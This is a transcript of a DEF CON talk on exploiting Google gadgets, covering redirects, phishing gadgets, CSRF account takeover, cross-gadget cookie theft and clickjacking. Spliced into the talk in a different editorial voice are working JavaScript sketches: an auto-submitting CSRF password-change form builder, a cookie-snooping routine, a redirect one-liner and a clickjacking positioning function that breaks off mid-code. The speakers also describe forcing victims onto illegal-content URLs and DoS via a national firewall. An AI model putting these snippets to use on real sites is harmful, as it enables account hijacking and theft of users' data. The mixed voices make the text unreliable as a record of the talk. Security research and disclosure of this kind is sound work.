Yes, thumbs up. Yes, good, perfect. All right, so my name's Robert Hansen. This is Tom Stracener. We're talking about exploiting Google gadgets. It's nice that you guys could come and join us. I thought the room was going to be about a third this size. So welcome to everybody. You might have seen some stuff in the news over the last couple days, front page of MSNBC, Associated Press. It's all over the place. So we modified the speech a little bit from Black Hat just because we got more information over the last couple days. And we also had to shorten it a little bit just to fit it in the hour time slot. So we're going to be kind of racing through a couple points. But you'll get the good stuff. Tom? So of course you know Robert. He really needs no introduction. Then my name is Tom Stracener. I'm a senior security analyst for Cenzic Inc. We're an application security company specializing in producing an application security scanner, and we do software as a service. So I'm their chief analyst. And this is Robert. I'm Robert Hansen, for the five people in the audience who have not met me. Please come up afterwards. I'd like to talk to you. But I run a small consulting company. It's five people. We have more billion-dollar companies than we have employees. And I run a couple of small websites called ha.ckers.org and sla.ckers.org. Have you heard of it? Anybody? OK. Yeah, there's one person back there. So who's RSnake? Yeah, who's RSnake? That's me. So I just wanted to start off by saying thank you so much for having me. This is the first time I've ever spoken at DEF CON. I've spoken at Black Hat three times. But this is the first time here. So I'm actually really honored to be here. I wanted to start this whole thing off by spending a couple minutes. And I apologize, but I kind of want to do this because I think it's important. Talk about the history of how this all came to be. There's been a lot of miscommunication, I think mostly on my part. And there's been a lot of reasons for that.
A lot of people that I had to protect and a lot of stuff going on. I didn't want to do things too quick, too fast. So I want to talk about what happened. And hopefully that'll explain some of this stuff. Only a few people know the story. Myself, a couple of people at Google know new parts of it as they kind of floated in and out of the company. I'm the only kind of consistent factor in all of this stuff. So just sit back and I'll explain. So before we start, I think we've all heard these types of sentiments before, from different companies. This is Google's version of this. If you find a vulnerability, we ask that you share it with us and we'll let you know and we'll fix it in a timely manner, or whatever, the kind of normal jargon you get from big companies. So we'll get back to this. This is straight from Google. So this all started about four years ago, 2004. I found, well, not me personally, but the people I was working with and I found that a bunch of redirections were being used by phishers through Visa, DoubleClick, eBay, and Google to try to anonymize and/or confuse users as they were clicking through things, to land them on a page that they didn't assume they were gonna be landing on. So we told everybody about the problem, for those of them who weren't aware, and of course no one was aware. So we told everybody that it was happening and everyone perked up immediately and said, oh yeah, that's bad. So they went off to go do their fixes, or not. So in this case, Visa closed their hole down in just a matter of hours. It was amazingly fast, incredibly fast. I've never seen anything like it, and usually redirects are kind of complicated to close because you risk breaking functionality. DoubleClick fixed theirs within days, but they only sort of fixed it. They fixed it with a blacklist. They said they have a permanent fix for it, but they didn't want to turn it on because they didn't want to incur the usability hit if they didn't have to.
They thought it was a one-time deal, and for them it was. So they did a good job. They have the ability to turn it on anytime they feel like it. eBay fixed it within a couple of weeks, and there was a bunch of reasons why it took that long. Like I said, a lot of the functionality that they had to kind of deal with, and they broke stuff, and so they had to fix that other stuff. And Google still hasn't fixed all the vulnerabilities, and it's been four years. So word got out fast. This wasn't just something that a couple of companies knew about. Like it's out there. Like this is happening. It's in people's inboxes. I'm not making this stuff up. So 2004 was when it really started. About 2006 it started being used for spam as well. But it's out there. I mean, if you search for this stuff you're gonna find it. So there's a couple of failures that kind of came to be throughout this whole process that I'd kind of like to point out. Everybody's got vulnerabilities. I'm not the guy to say, oh, that guy's horrible, he's got terrible security because he's got one tiny little redirection hole. I'm pretty sensitive to people's problems, but I also try to protect consumers whenever possible. So we informed Google that they were actually being exploited, and they said, okay, we're gonna fix this, but we're gonna do it with a blacklist. And I think we all know how to get around a blacklist. You just change a character and you're past the blacklist. So that didn't exactly work, and the bad guys figured it out as fast as I just told you. So we felt like this was kind of bad, that we should be talking with them, so we had a bit of a dialogue and they just wouldn't budge. And it actually took a really long time to even get them to implement the blacklist. I don't have a timeframe for you, but it was months. So there was a bunch of reasons why you'd want to fix it. Sorry, why not to fix it, rather. It's expensive; you have to hire engineers if you don't already have them on staff.
You have to QA it and release it, and you break stuff and you gotta go QA and release that stuff, and it takes time and that kind of stuff. It's useful for tracking users, and that's the primary reason why most of that stuff was there in the first place. It was actually designed so they could track people as they're navigating to the site and clicking on links, so that they can do navigation changes or tune their rules or whatever. And lastly, it would break stuff like I'm Feeling Lucky, which is a huge portion of why people like Google so much. You can click that button and you're on to the next page and it's great. You don't have to deal with the whole search results thing. I don't know, does anyone actually use that, by the way? Raise your hand, please. Like one, two. It's okay, Google, you can fix that one. So why fix it? Altruism, right? It's the right thing to do. Google's not evil, right? We're trying to fix a consumer-level problem. It's being used. It's not a theoretical attack. It's actively being used by bad guys. We've got tons and tons of examples of it, and ultimately it stops contributing to the problem. So I waited two years. I sat on it, I talked with them, I didn't do anything for two years, and then I went full disclosure on their ass. So I don't hate Google, right? But I like consumers a lot more, it turns out. So the first thing I did was release four redirection vulnerabilities on Full-Disclosure, I think it was, or Bugtraq. I can't remember which one now. And I didn't get any reaction. No one even commented on it or anything. So I was kind of like, well, that didn't work. So then I disclosed an XSS vulnerability and then suddenly it exploded. Everybody was all interested. Everyone wanted to talk about it, and it's like, it's the same damn thing. I can redirect either way. Sure, there's other stuff and I can grab cookies, but the bad guys are really very interested in this redirection thing too.
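The blacklist approach described above fails for exactly the reason mentioned: change one character and you're past it. Here's a minimal sketch of that failure, assuming a hypothetical server-side redirect check; the blacklist entry and URLs are made up for illustration.

```javascript
// Hypothetical server-side redirect check, modeled on the blacklist
// approach described above: allow the redirect unless the target's
// hostname is on a known-bad list.
const blacklist = ["evil.example.com"];

function redirectAllowed(target) {
  const host = new URL(target).hostname; // parse the redirect target
  return !blacklist.includes(host);      // naive exact-match lookup
}

// The listed host is blocked...
console.log(redirectAllowed("http://evil.example.com/login"));     // false
// ...but a one-character change (a new subdomain, a lookalike
// domain, a different TLD) walks right past the blacklist.
console.log(redirectAllowed("http://www.evil.example.com/login")); // true
```

A whitelist of known-good targets or a signed redirect parameter is the usual permanent fix; a blacklist only blocks yesterday's attacker.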
So I was trying to use that as a point to leverage the bigger picture, which is that we need to close down this redirection thing that's still there. It's been there for years. We're gonna fix that. So Google actually agreed with me. This isn't a case where they're like, no, no, this isn't something we wanna fix. Matt Cutts is their head search guru. He's kind of the unofficial spokesman for search. And there's three different examples of him on the net talking about why this is bad and how it's being used for phishing attacks. So Google knows, they agree. This is not me just sitting up here telling you it's a bad thing. They agree with me. So why do I personally care about it? So first of all, let me explain how anti-phishing technology works, for those of you who don't deal with this every day. First, you have known good sites. So like, say, eBay, Citibank, those are the whitelists. You don't wanna mark those as phishing sites even though they look an awful lot like a phishing site. It turns out they're the real site. For false positives, a good example is Google cache, for instance. You don't wanna block Google cache. So you have to put that on the whitelist. Webmail, it looks an awful lot like a phishing site. It's got a form on it. It might even say username and password, even though there's no username, password field necessarily. So you gotta mark all that stuff as whitelist because you don't wanna deal with it. Your CSRs don't wanna get overloaded. It's a pain in the butt. Second is blacklists. You have a known set of bad things. People are sending it to you or you detect it or whatever, and you wanna mark it as bad, and you throw it in your anti-phishing stuff, and then everybody's safe a couple hours later when it propagates, or 10 minutes or whatever it is, depending on the technology. And lastly is heuristics. Heuristics really aren't very good, it turns out.
I've read tons of papers, and every paper I've read just blows up in real life when you actually look at the vast weirdness of the internet. And you also have DNS sometimes, but that's stuff like OpenDNS, and it doesn't work at all because phishers have learned to use IP addresses, so that doesn't matter. So Google is not exactly the most forgiving company when you mark them as a phishing site and you block a million people from going to their website. And well, we did that, because it turns out they were a phishing site. And we felt bad about it, but really, at the end of the day, you have two options, right? You either aren't a phishing site or we mark you as a phishing site. So really, it's up to them to stop being a phishing site. So I found this Google gadget thing just kind of randomly, looking at it one day. And by the way, I never, ever go to Google, and within five seconds I found this thing too. So it happens that JavaScript can redirect as well. It doesn't just have to steal cookies or all this other stuff, it also can redirect. It's pretty good at it, as a matter of fact. And it turns out that most people have JavaScript turned on, especially when they're at Google, because Google breaks a lot of stuff if you don't have JavaScript turned on. So I'm nice, though, this time. I'm actually trying to be nicer to Google. I kind of fluctuate. Sometimes I'm like, come on, Google. And other times I'm like, Google, you know. So this time I actually released it to them, I sent it to them, and I'm like, all right, here it is, I'm being a nice guy, a gentleman, go fix it. They've been pretty good about XSS in the past. So their response is: on further review, it turns out that this is not a bug, but instead the expected behavior of this domain. All right. Since these modules reside on the gmodules.com domain instead of the google.com domain, cross-domain protection stops them from being used to steal Google-specific cookies. So they gave me the definition of XSS.
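The point above about JavaScript being "pretty good at" redirecting takes exactly one assignment. A minimal sketch, with the location object passed in so the logic can be exercised outside a browser; the phishing URL is made up, and in a real gadget you'd simply assign to window.location.

```javascript
// In a real gadget script this is simply `window.location = target;`.
// The location-like object is injected here so the one-liner can be
// demonstrated outside a browser context.
function redirectVictim(loc, target) {
  loc.href = target; // the browser navigates away immediately
  return loc.href;
}

// In a gadget served from gmodules.com, no cookie theft is needed:
// redirectVictim(window.location, "http://phish.example.com/google-login");
```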
Well, it turns out that I wrote the book on XSS. So my response was a one-word "wow." Because what are you gonna say to that, right? So shame on you, Google, right? So Google already agreed that this was bad, right? They agreed, we're on the same page. Google's still an evil, litigious company, maybe more so now than ever. There's a lot of reasons that they're more careful about how they protect their brand. Google doesn't have the first clue about what JavaScript could be used for, apparently. And they lied about the danger of the vulnerability that they had already agreed to fix, in this case, the redirection vulnerability. I'm not gonna worry about that guy. So, and bad guys are still using it. So there's other stupidity that just kind of rolls into all this stuff. This is another guy who found the exact same type of vulnerability, but it was in Blogspot. And this is an email that he's relaying to me: the issue you describe is not actually a vulnerability and is not cross-site scripting. In this case, you are simply including allowed script in your blog. This does not constitute a security breach. You heard me? If you include malicious JavaScript, that's not a security breach. You heard it from Google. So it turns out that Google is marked as the top most-infected IP range by StopBadware, by their own metrics. This is not somebody else's metrics. That's theirs. They were quick to remind me of that. I don't know why that helps, but there you go. This is something that was posted on my blog. So normally when people are posting on my blog, they're talking to me or to other people. And in this case, he's talking in third person. So Google, their internal department, is trying to defame me on my own website from their own IP space. So it turns out I'm pretty good at looking at my logs. So meanwhile, more holes are opening. Things keep opening up and we're not getting ahead of the problem. We're actually opening up more vulnerabilities.
So I kind of want to get ahead of this problem, because it turns out that, well, my mom surfs the internet. I kind of care, right? I've got a vested interest. So ultimately, I just want to stop fighting and let's all just get along and fix these things, because I don't really like playing this game. I'm getting old, dirty, balding a little bit. So this is some other press-worthy stuff. Regarding the security flaw disclosure, actually this is about a Google Desktop thing that I found, unrelated to this particular topic, but just some context. Regarding the security flaw disclosure, Mr. Merrill, who was their CIO, I think he just recently left a couple months ago or something, says that Google hasn't provided much information because consumers, its primary users today, often aren't tech savvy enough to understand security bulletins and find them distracting and confusing. They're very distracting, all this security stuff, and all of you, you're too stupid to understand all the security stuff. So because Google's fixes happen on their servers and are deemed invisible, they shouldn't have to tell you guys. And another thing, on the phishing problem, we were talking about something else, but News.com basically said, in the two months since RSnake first made his concerns public, no one from Google has publicly disputed anything he said. So it turns out, yesterday, or two days ago, Google did dispute something I said, finally. So it's been four years and they finally said, we don't agree with you. And the one thing they said they don't agree with is not any of the actual security stuff; that they do agree with me on, I guess. And by the way, it's funny, they didn't come up to me and tell me that. They told the Associated Press. So it's like I'm Iran and Google's the United States, and the Associated Press is Syria. So we're doing this whole trifecta thing now. I can't talk directly to them. I gotta go through the Associated Press or you guys. So here we are.
And the thing they didn't like about what I said is, they said that in the very few cases that they found malicious software on gmodules, implying that it has happened, they were able to quickly take it down. So, Tom, I don't know, did you ever have your gmodules taken offline? No. I still haven't had mine taken offline. I took my own offline, because, there's a long story, but I have Jeremiah's password in one of them, so. So we're just kind of exacerbating some of the other problems. And we have to kind of go, like I said, pretty quick through this, but Google is, and will be, and always has been vulnerable. They haven't been open with consumers about it. They haven't fixed things in a timely manner. It's been four years. And remember: if you share it with us, we will fix it. So we shared a couple of different vulnerabilities Tuesday, which you'll also see. And I still haven't been told the timeline, so we know this is not a true statement. It certainly hasn't happened for any of the redirection stuff. They have fixed some of them, but they haven't told me when; they haven't interacted with me on that level. And ultimately, this all comes down to the fact that they just want to track you guys. So. What's up, DEF CON? I really don't see enough beer in anyone's hands. I don't know what's happening. This is terrible. Oh, good, good, good, good. So this slide really summarizes the essence of our talk, and it boils down to this: today, most malware is specifically engineered for Windows. In the future, malware will be specifically engineered for the web. And I don't think there could be a more true statement. And this is PDP quoting someone on his blog. And so our speech is really forward-looking in this regard. And while Robert's introduction was essential to give you the background and the motivation, there's actually a larger issue that we'd like to draw your attention to.
But before we go and talk about that, I just want to be clear about what's at stake. So there is the gadget XML construction that you actually create when you write your own gadget, and this gets hosted. In the CDATA section of the gadget, you can instantiate arbitrary JavaScript and HTML. If you browse to this URL directly, it'll execute. This is one dimension of the problem. It's also a dimension which leads to phishing attacks and content spoofing. But there's an entirely other dimension. It's what we're calling gmalware, because we think that sounds like a Google-trusted type of malware. And the idea is it's just a bad gadget. Now, is this a problem today? Is it rampant? No. All of the bad gadgets that we'll show you, we created in the lab. That being said, the potential is there. And it really points to a wider problem. I'm gonna skip a few slides just so that we can get to the movies, because they rock. But the broader issue at stake really has nothing to do with Google at all. It's the business end of the crack pipe of Web 2.0, right? And it is that everyone should be able to create their custom content and share this and be interactive and form communities. And you have this situation where you are empowering users in the form of gadgets or widgets or whatever. And whether you're talking about Facebook or Google or anything, as long as there's code written by untrusted third parties, or that anyone can contribute to, once the profit motive is there, then the malware incentive will exist. So no, there's not a lot of gadget-based malware today. But the potential exists, and it's actually a much broader systemic problem. So what about Google gadgets? Well, they're simple to build. You can run them on multiple sites. We'll talk about those in just the next slide. And in Google's own words, they have the potential to reach millions of users. So, high volume.
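The gadget XML construction just described has a simple shape. A minimal sketch following the public gadgets spec; the title and script body here are placeholders, not an actual malicious gadget:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<Module>
  <ModulePrefs title="Innocuous-Looking Gadget" />
  <Content type="html">
    <![CDATA[
      <p>Anything in this CDATA section is rendered verbatim.</p>
      <script>
        // Arbitrary JavaScript executes here -- both inside the
        // iGoogle container and when the gadget's gmodules.com
        // URL is browsed to directly.
      </script>
    ]]>
  </Content>
</Module>
```

The hosting domain, gmodules.com rather than google.com, is what Google's response leans on; but redirection, phishing, and content spoofing don't need google.com cookies.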
I think it's important for you to understand that Google's vision for gadgets is actually pretty cool. They speak about it often in ideological terms. So I'm gonna just go through a number of points that really summarize what I think of as the spiritual heart of the idea of gadgets. One is that they should spread via the social graph in a viral way. And this is really sort of a word-of-mouth, blogosphere way of spreading gadgets so that everyone ends up using them. They're decentralized. They're also cached. They're distributed, so that if your gadget becomes a big hit overnight, it isn't gonna crash some server if everyone's using it, because of the way the architecture is built. There's a fundamental idea of content-rich self-expression, and that's really where Google comes back and says, yeah, that's why the arbitrary JavaScript and HTML is needed. Over time, gadgets are supposed to dynamically change. And that means that as each of us in this room has our own favorite gadget, and we're using the same gadget, that as we use it, the gadgets can collaborate. And ultimately, the states of our individual gadgets will change to reflect, say, our own opinions. And Google calls this the social graph, right? It's essentially what you might think of as an objective tap into the collective behaviors of the gadget as it's spread over a base of users. The idea is to expose the activity stream and to be able to create sort of visualizations of that and show, oh, look, this is the activity of the gadget. Finally, gadgets wouldn't be very interesting if they couldn't drive communication. The ultimate idea is that we should really use these and form communities around them, whether it's smaller communities or larger communities. The idea is that people participate in a gadget system and that gadgets should solve real-world problems and ultimately generate revenue. Google has seed money.
I think it's $100,000 for anyone that proposes to them a business plan where there's serious revenue-generating capability in a gadget. So the point being, once money actually starts flowing through, and once the financial incentive from malware exists, then you're gonna start seeing more of this type of thing pop up. Yeah, and I mean, we already have the idea of phishing, and it's already being actively used, right? Robert, speak to that. But that's not a good business model. That won't get you the $100,000. Try something else. Please. So where can you put your gadgets? Well, you can put them on iGoogle, your iGoogle homepage. You can put them on arbitrary websites. You can build them to interoperate with, like, Orkut using the OpenSocial API. Or you can create them to interact with your desktop, which foreshadows a lot of the problems that we're likely to see. So what are the high-level security concerns? When Robert and I set out to do this speech, we really just sort of scratched our heads and said, a priori, what are the problems we expect to find? We made a long list, and we actually created proofs of concept and discovered vulnerabilities that closely matched our initial expectations. The high-level concerns are that gadgets can be easily weaponized. You can turn them into payloads. And by a payload, I mean specifically that: a malicious gadget designed to deliver a particular type of malicious code to the user, whether it's Flash or JavaScript or whatnot. They're written by who the hell knows who, you know. Third-party code can be contributed, and this is part of the Web 2.0 vision, right? But the end result is that you really have to stretch hard to find accountability within the gadget community: who wrote it, and can I have some level of assurance as a user that I'm getting what I think I'm getting when I use this gadget?
What we will show you is that within your iGoogle homepage, gadgets can attack one another, and they can potentially attack the desktop. And of course they can have the same vulnerabilities as most web apps. So I'd just like to present to you a basic warning; Google does suggest that there's a potential risk there with gadgets. For instance: most of our gadgets are created by third parties. If you have questions or concerns about the functionality of your content, contact the author, right? That doesn't really do you very much good if you have a malicious gadget that's tracking your behavior. You think the author is going to be sympathetic? No, of course not. From a high-level perspective, I'm just gonna breeze through these. There's issues in gadgets with JavaScript, HTML and script injection. There's the potential for defacement of one gadget or manipulating its content through poisoning. And this is kind of a weird thing, but you can imagine scenarios with cross-site request forgery, where the gadgets themselves are measuring, say, some rating or approval or some voting process, and there would be ways to manipulate gadgets in order to skew that toward one party or the other that's in the voting queue. You can spoof gateways very easily, and it's not always clear whether your connection is secure when you're using them. But ultimately, and this really speaks to the fresh brand of gadget malware that Robert has created, you can perform surveillance in a very invasive manner and you can also create exposures. Finally, there's a whole range of bad things. Hopefully our videos will speak to that. And the underlying point is not that gadgets are bad and should never have been created, but that if you're someone with malicious intent, you can really do some very dangerous things. I really loved this, because I was poking around creating some gadgets, and this was actually a testing container for gadgets.
And if you'll look up here, this was Google's code, completely. It has the option to do evil. And Robert created the sort of Shakespearean version of the humor there for you to appreciate. But I just found that to be absolutely freaking hilarious. So the advanced API digs down into the desktop, really mucks around there. And the important point to take home is that there is the potential for these little mini applications that exist on your iGoogle homepage to interact with your desktop, right? Now, maybe you see the big warning there when you read it and you say, well, maybe I don't want to install the performance-o-meter, but actually it's not so clear-cut in the wild, because we can create some very malicious gadgets that you may not even know you've added. So, thought experiment time: the people's gadget. The reason why I've chosen this topic is because there's no better example of an agency that has coercive intent than a government that attempts to suppress certain rhetoric or to monitor subcultures. And so this will just give you a framework in order to understand how one could use what you might think of as relatively innocuous functionality to create some very malicious gadgets. This is pure shock value, but this guy's about to get run over by three very big gadgets. Are you feeling lucky? Yeah. So what types of innocuous functionality could actually become dangerous if your intent was to spy or your intent was to be coercive? Well, even something as simple as monitoring the incoming feeds that you're pulling in from websites for content, counting word frequencies and actually determining if the content is subversive. You could actually have a gadget that is uploading your IP address and the search terms that you're using. I'll show you that.
You can have a gadget that actually looks in and spiders the websites that you retrieve content from, so that this gadget could actually build a picture of the world around itself. Now, it shouldn't be lost that gadgets of this nature can also spider and crawl your internal network. So while you're happily surfing away at iGoogle, this thing is plunking away at your intranet. I don't think there's much more to say on that. Some of the serious problems boil down to cross-site request forgery. I'm not gonna spend a lot of time on this slide because I have a movie. Robert, do you wanna speak to anything? Yeah. Just very briefly, a couple of them. So there's the one that you can see at somesite.cn. So one thing about the Chinese firewall is, if you send certain packets through, like the word Falun, which is Falun Gong, which is sort of like Tai Chi, except way more dangerous, if you send that across the wire, the Chinese firewall will shunt you for like five minutes or something. So if your business happens to do a lot of business while going through a single NATed IP address, I can basically, essentially DoS you from connecting to your supply chain management or whatever in China. And then another one is, like, child pornography. There were a couple cases of that, where somebody inadvertently downloaded it or got some spyware or whatever, and you guys have all heard those cases. But one example is, I don't necessarily have to even know where child pornography is. I just have to construct enough query strings, send you through whatever, and you end up on those pages. And it turns out I'm pretty good at guessing what those query strings contain. So, SQL injection, remote file includes, all that stuff. I can force you to connect to any internal websites or external. I can force you to hack on my behalf, all kinds of nasty stuff. So, I mean, that's just cross-site request forgery. I think you're all aware of it. We'll have an example, though.
All right, so let's get into the movies and we'll show you. The first example that I wanna pull up and show you is an example of gmalware. Now, the general concept to take away is that you have a popular site that you suspect the user is going to have an account on. You create a gadget designed to take an action on that account, through cross-site request forgery, that the user isn't aware of. Now, in the demo I'm gonna show you, it's really obvious. I made the windows expand to full screen and everything. But in real life, you don't have to see any of this. So, actually, what I'll show you is owning singlesnet.com with a little gadget. It's actually the Hello Kitty gadget. So, here's our gadget. Click me, hello. So, here we are. We're player John Hancock 2000 and we're logging in. So, we were trying to get a good hookup here on SinglesNet. I reported this vulnerability to them two years ago. And I'll tell you the response after you see the demo. But ultimately you can see that here I am. This is my email. And you'll notice you can change your password to a new one, but you don't have to input your old password. Okay, so you just put your new password in twice. And there's zero protection against cross-site request forgery. So, you can actually create a form, spring-loaded by JavaScript, mounted on a server. And then I just instantiate a little popup window in JavaScript, stick it off screen. And so it immediately launches a CSRF attack against the site. Having clicked the gadget, our password is no longer valid. So, now we're gonna log in as the attacker. And we can log in with the same username or with a different email address. And of course with our brand-new hacked password. And so now you can notice that the attack, just the gadget itself, changed the contact email. So, this is one example of a piece of maliciously designed gadget technology that could trick the user into performing an action that they don't want to take.
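The spring-loaded form from the demo can be sketched like this. The endpoint URL and field names below are hypothetical, made up to mirror a password-change form that never asks for the old password:

```javascript
// Build the attacker-hosted page: a hidden form aimed at the victim
// site's password-change endpoint that submits itself on load.
// The endpoint and field names are hypothetical.
function buildCsrfPage(action, fields) {
  const inputs = Object.entries(fields)
    .map(([name, value]) => `<input type="hidden" name="${name}" value="${value}">`)
    .join("\n  ");
  return `<form id="f" method="POST" action="${action}">
  ${inputs}
</form>
<script>document.getElementById("f").submit();</script>`;
}

// The gadget opens this page in an off-screen popup; the victim's
// browser attaches their session cookie, and the forged POST wins
// because the endpoint never asks for the old password.
const page = buildCsrfPage("http://dating.example.com/account/password", {
  new_password: "hacked123",
  confirm_password: "hacked123",
});
```

The fix on the site's side is a per-session anti-CSRF token (and requiring the old password for a change), which makes the forged form unguessable.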
And it's not limited to SinglesNet. It's just that they are highly susceptible to it. So, my contribution to this part of our talk was to actually port some of what I think of as, like, hackware JavaScript to gadgets, just to see how far I could go. On my blog, badgadgets.net, I'll put up the links to the XML if you actually wanna play with these abominations. But ultimately, we ported PDP's Yahoo Site Explorer spider, so that it queries the Yahoo page data service and gives you a spidering of a website based on that. And you can call external PHP scripts. That's just sweet. Especially if you wanna do, like, a shotgun attack against a user's browser and root them. You can actually do that just fine with a little gadget. Consequently, scanning for this sort of thing is kind of hard, because since they allow you to just pull up arbitrary content, you don't actually see the malicious code inside the gadget itself. So this, in all its glory, is the example of the PHP spider that we were talking about. So the gadget can literally spider your intranet while you're using it, without your knowledge. Or it can use Yahoo's Site Explorer. Finally, I ported a port scanner. Once again, PDP, from his AttackAPI. I just ported the port scanner from there into a gadget. Worked great. Now, this is a picture of a phishing gadget. And actually, what you are seeing is a page rendered from the XML content of an existing gadget, in the CDATA section. The JavaScript and HTML is rendering, and it creates this fake page. And so we can use any type of coding style that we want to make perfect, basically, you know, simulacra of any login portal. Consequently, from some conversations I've had with Google, and I don't want to call the guy out by name because I actually have a pretty good working relationship with this guy, so I'm not trying to sling mud.
But there's a belief that this just really isn't a very significant problem. We really kind of beg to differ. Do you want to add something? So I know this slide doesn't really look like a whole lot, but I think this is probably the most important slide in the deck, even though it doesn't look like much. So imagine, first, I'll take you out of the picture. Imagine your mom is pretty tired in the morning. She got her cup of joe, woke up a little sleepy, watched I Love Lucy, you know? She boots up her computer, double-clicks the Internet Explorer icon, it takes her to her home page, and it's Google. And she's already authenticated, because she never cleans out her cookies. She turns her back, takes a quick shower, comes back, and she's presented with this page. She didn't click on a link, she didn't type anything into her address bar, she didn't get an email, she didn't click anything. There's no user interaction required whatsoever. You go to Google and you're immediately presented with a phishing site. So when they're talking about, you know, you can't run JavaScript in the context of google.com, who cares? I don't have to. I can immediately redirect you to something that basically every user is gonna fall for. There's only a very small handful of users, probably in this audience, and that's about it, who won't fall for this immediately. And I think actually quite a few people in this audience probably would anyway. So the final thing is, you know, exporting a tab to your buddy. The tab is sort of the container where all your gadgets live. What I find really telling about this is you can export your gadget, but even Google warns you, blah, blah, blah, be careful, your settings can include private data.
So what this tells you directly is that your gadget isn't just some private little world that you own exclusively, with no touch points to the internet or the broader iGoogle framework. Your data resides within that gadget, and you can expose it. And on that note, I'm gonna hand it back to Robert. So we built this tiny little gadget. I apologize for having used multiple media players here. Does anyone know a really good media player that plays just everything, so I don't have to deal with this anymore? KAM, okay, got it. So there's two gadgets here. This one over here on the left is my little stockbroker application that I wrote. It just keeps stocks, tells you how much stuff is worth. Kind of a funny side note: Google is $1,800 a share. They haven't learned how to split yet. And on the other side is the bacon, because swine is evil. And you'll notice they're on different domains. Now, I thought the different-domain usage was actually a security function, but I've talked with somebody at Google and they said it is indeed not meant as a security function; it's actually meant for caching purposes. So that's good, because it wasn't much of a security function. So here, I clicked on the link, or whatever. I didn't have to click on a link, it could have just been automatic; I just did it to slow things down so you could see what was going on. And it popped up a bunch of iframes, which are just all of those different subdomains, so 81 through 90; I just picked a range to speed things up. And I found one on the other domain, which is 86.gmodules.com, which immediately does a redirection. Or not quite immediately; I think I gave it like 10 seconds or something. And so what happened is I detected that there was a cookie in that other subdomain.
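The detection step is easy to sketch. Because cookies scoped to .gmodules.com are visible from every numbered subdomain, a gadget running on 86.gmodules.com can simply rummage through document.cookie for names another gadget might have set. The cookie names below are made up for illustration.

```javascript
// Sketch of cross-gadget cookie snooping: parse a cookie string and keep
// only the names an attacker cares about, e.g. a session token a sloppy
// gadget stored client-side. Names here are hypothetical.
function findInterestingCookies(cookieString, interestingNames) {
  const jar = {};
  for (const pair of cookieString.split(';')) {
    const idx = pair.indexOf('=');
    if (idx === -1) continue;
    jar[pair.slice(0, idx).trim()] = pair.slice(idx + 1).trim();
  }
  // Return [name, value] pairs for every interesting cookie found.
  return interestingNames.filter((name) => name in jar)
                         .map((name) => [name, jar[name]]);
}

// In the browser, the attacker gadget would pass document.cookie here.
const hits = findInterestingCookies(
  'theme=dark; stock_session=abc123; lastTab=2',
  ['stock_session', 'login_token']
);
// hits → [['stock_session', 'abc123']]
```

Everything after that, the XMLHttpRequest that pulls the other gadget's content, rides on the same shared-domain trust.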
So even though those two things are separate, they share common elements, because things like cookies work on the entire domain. So all I had to do was search for something that I thought might be there. In this case I wrote a really terrible application that used cookies, and I was able to steal information out of it, including the cookie, which could have held login information. A lot of gadgets are very poorly written and have, like, unencrypted everything; you just send your data to some third party, who then authenticates it for you to some other third party. Really scary stuff, actually. So you can see here that I've done an XMLHttpRequest, grabbed all the content of that gadget, thrown it onto the page just so you could see that in fact it is there, and rendered the content as well. So you can actually see that it is indeed the same gadget. Keeping state was a little tricky, but it turned out not that hard to code. So I can see stuff like stock tips or whatever; in this case it says to sell on a rumor of a gmodules exploit. Oh, and this is, I just decided, I've got a lot of really crazy logs. So I decided to quickly parse through them and see if I got anything out of gmodules.com, and indeed I did. This doesn't necessarily have anything super sensitive in it; these are only a couple of examples of how many people are really linking to me. But this easily could have contained all kinds of crazy stuff. Who knows what these people are putting in this URL structure. So a lot of people are gonna say, okay, you've demonstrated that the gadget framework is potentially dangerous, but who cares? How are you gonna get it into somebody's iGoogle? That's the real trick, right? That's why we're all here. If you can't do that, this is a totally moot point. I hate speeches that just go, oh, theoretically, if I had your password. Well, okay. So there's a couple different ways to do it.
First of all, people can add something that they think is good. It started off being good, it was a neat little gadget, and then suddenly I'm like, oh, I've got so many users, and then I take them all over. So that's one way. Another way is that we can hack into somebody else's gadget hosting, someone else is doing that hosting, and have them change their thing just slightly into something bad. And it turns out websites are very easy to hack into. We haven't yet found one that we can't. The other way, and this is a bad way, I don't actually think this is hardly worth talking about, but if you have cross-site scripting on Google, and if you have it, why would you care about this? But if you had it, if it was like a reflected XSS, you could use this as more of a persistent container for your cross-site scripting. So if you need longevity, like a long-term attack that took a lot of cycles, or a lot of CPU, or whatever, or you wanted to test many, many different things, well, this is one way to do it. Barely worth talking about, though. And we can force them to add it remotely, evilly. So, we created this little demo. And this is a little confusing to watch, and I apologize. I didn't want to get on the Defcon network and worry about bad demo karma. So the IE instance is the bad guy. The Firefox instance is the good guy. The IE instance is, actually, this is Jeremiah's account, long story. And so I'm using it to contain data and hold on to that account, and I'll be monitoring it. So you can see that vulnerability master is the bad guy. And I'm in his web history, you know, whatever section of the website. So you can see nothing up my sleeves. I refreshed, and in fact, there is nothing in the web history. I cleaned it out just before I did this. So then I refresh, nothing there. There's no gadgets.
Now I'm in this Teddy account. You know, Teddy's this nice woman who doesn't want bad things to happen to her. And you notice she's on ha.ckers.org, right? So what you see here is this little "Add it now" thing that I made semi-transparent. I could have made it completely transparent, but I wanted you guys to see what's going on. Well, that's two iframes. There's an iframe that's floating in space, following the mouse cursor. We've all seen those things that trail your mouse, and you're like, ah, you know, it's like a little clock or something. I hate that. Well, that's an iframe into another iframe, which is positioned up into the corner, so it frames exactly the specific X-Y coordinates that I need to be right under the mouse cursor. And you can do it for Internet Explorer or Firefox; you just have to deal with the cursor, how wide it is, or where it's located. So when I click on it, I'm not clicking on my domain, ha.ckers.org. I'm clicking on Google. It's a couple of iframes away, but that click is going all the way through all those iframes to the real Google. And what it's doing is adding a malicious gadget that I've constructed, which normally is supposed to be off limits. I'm not supposed to be able to force people to add my own gadgets. So if you hit refresh, you can indeed see that there's a new gadget here, the bacon gadget. It's a different bacon gadget. And this little broken link right here, or broken image rather, I made visible so you could see what's going on. And this is cross-site request forgery, but it's kind of same-site request forgery. What it is is a URL structure that allows you to log somebody into an account. I don't know why you can have all that stuff on the GET string. It's not really a safe way to do things anyway.
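The iframe-follows-the-cursor trick comes down to a tiny bit of positioning math plus a mousemove handler. This is a sketch; the button offsets are hypothetical and would need the per-browser tuning Robert mentions.

```javascript
// Sketch of the clickjacking overlay: an outer iframe tracks the mouse,
// and the framed page inside it is offset so the real "Add it now"
// button sits exactly under the cursor. buttonX/buttonY are the button's
// hypothetical coordinates inside the framed page.
function overlayPosition(mouseX, mouseY, buttonX, buttonY) {
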